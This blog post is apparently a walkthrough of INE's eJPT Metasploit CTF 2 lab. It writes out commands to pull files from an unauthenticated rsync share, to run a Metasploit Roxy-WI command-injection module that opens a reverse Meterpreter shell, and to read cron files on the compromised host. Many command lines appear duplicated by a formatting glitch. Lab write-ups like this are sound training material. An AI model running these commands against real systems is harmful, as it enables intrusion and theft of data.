June 22, 2026
Host & Network Penetration Testing: The Metasploit Framework CTF 2 — eJPT (INE)
A walkthrough covering RSYNC enumeration, file exfiltration, Roxy-WI webapp exploitation, and cron job investigation to capture all four…
Suraj Apar
3 min read
- 1 Q. Enumerate the open port using Metasploit, and inspect the RSYNC banner closely; it might reveal something interesting.
- 2 Q. The files on the RSYNC server hold valuable information. Explore the contents to find the flag.
- 3 Q. Try exploiting the webapp to gain a shell using Metasploit on target2.ine.local.
- 4 Q. Automated tasks can sometimes leave clues. Investigate scheduled jobs or running processes to uncover the hidden flag.
- 5 Final Thoughts
A walkthrough covering RSYNC enumeration, file exfiltration, Roxy-WI webapp exploitation, and cron job investigation to capture all four flags.
Hello everyone!
In this blog, I'll walk through The Metasploit Framework CTF 2 from INE's eJPT path. Two Linux targets this time — one running an RSYNC service and the other a vulnerable web application. The goal is to capture four flags by enumerating, exploiting, and exploring the right places.
So, let's dive in.
Q. Enumerate the open port using Metasploit, and inspect the RSYNC banner closely; it might reveal something interesting.
As usual, I started with an Nmap scan:
nmap -T5 -sV -O target1.ine.localnmap -T5 -sV -O target1.ine.local
Only one port was open — port 873 running rsync (protocol version 31).
I hadn't worked with rsync before so I looked it up. rsync (Remote Sync) is a powerful Linux utility used for copying and synchronizing files either locally or across remote targets. Unlike cp or scp, it uses a delta-transfer algorithm — only sending what's changed rather than copying everything from scratch. More importantly for us: it can expose shared directories without any authentication if misconfigured.
To enumerate what's available on the rsync service:
rsync --list-only rsync://target1.ine.localrsync --list-only rsync://target1.ine.local
The output revealed a share called backupwscohen — and the first flag was right there in the banner alongside it.
Q. The files on the RSYNC server hold valuable information. Explore the contents to find the flag.
With the share name in hand, I listed its contents:
rsync --list-only rsync://target1.ine.local/backupwscohenrsync --list-only rsync://target1.ine.local/backupwscohen
Three files came back — TPSData.txt, office_staff.vhd, and pii_data.xlsx. Time to download them all:
rsync -avzp rsync://target1.ine.local/backupwscohen ./labrsync -avzp rsync://target1.ine.local/backupwscohen ./lab
Then I read all the files at once:
cd lab/
cat *cd lab/
cat *
Flag 2 was sitting inside one of the downloaded files.
Q. Try exploiting the webapp to gain a shell using Metasploit on target2.ine.local.
I started a fresh Nmap scan on the second target:
nmap -T5 -sV -O target2.ine.localnmap -T5 -sV -O target2.ine.local
Ports 80 and 443 were open — both running Apache httpd 2.4.52 (Ubuntu). The hostname in the scan result also gave a clue: roxy-wi.example.com.
I navigated to https://target2.ine.local in the browser.
It was running Roxy-WI — a web UI for managing HAProxy, Nginx, and similar services. I searched Metasploit for a matching exploit:
search roxy-wisearch roxy-wi
Found exploit/linux/http/roxy_wi_exec — an unauthenticated command injection RCE affecting Roxy-WI prior to version 6.1.1.0, rated excellent. Loaded it up and ran it:
use exploit/linux/http/roxy_wi_exec
set rhosts target2.ine.local
set lhost eth1
runuse exploit/linux/http/roxy_wi_exec
set rhosts target2.ine.local
set lhost eth1
run
Meterpreter session opened. I listed the root / directory:
meterpreter > ls /meterpreter > ls /
Flag 3 was right there in the root.
Q. Automated tasks can sometimes leave clues. Investigate scheduled jobs or running processes to uncover the hidden flag.
Still in the same Meterpreter session. The hint was pointing at cron jobs, which on Linux are stored under /etc/cron*.
I listed /etc/ to confirm:
meterpreter > ls /etc/meterpreter > ls /etc/
There it was — a cron.d directory with a recent timestamp standing out from the rest. I explored it:
meterpreter > ls /etc/cron.d
meterpreter > cat /etc/cron.d/www-data-cronmeterpreter > ls /etc/cron.d
meterpreter > cat /etc/cron.d/www-data-cron
The cron file was running a scheduled echo command every minute — and the string it was echoing was Flag 4.
Final Thoughts
This CTF introduced two techniques worth keeping in your toolkit — RSYNC enumeration and cron job investigation.
RSYNC misconfigurations are more common than you'd think. An unauthenticated RSYNC share essentially hands over the files directly — no exploitation needed, just the right command. And the cron job hunt for Flag 4 is a good habit to build early: automated tasks run as specific users, often with elevated privileges, and what they're executing is frequently overlooked during a pentest.
Thanks for reading!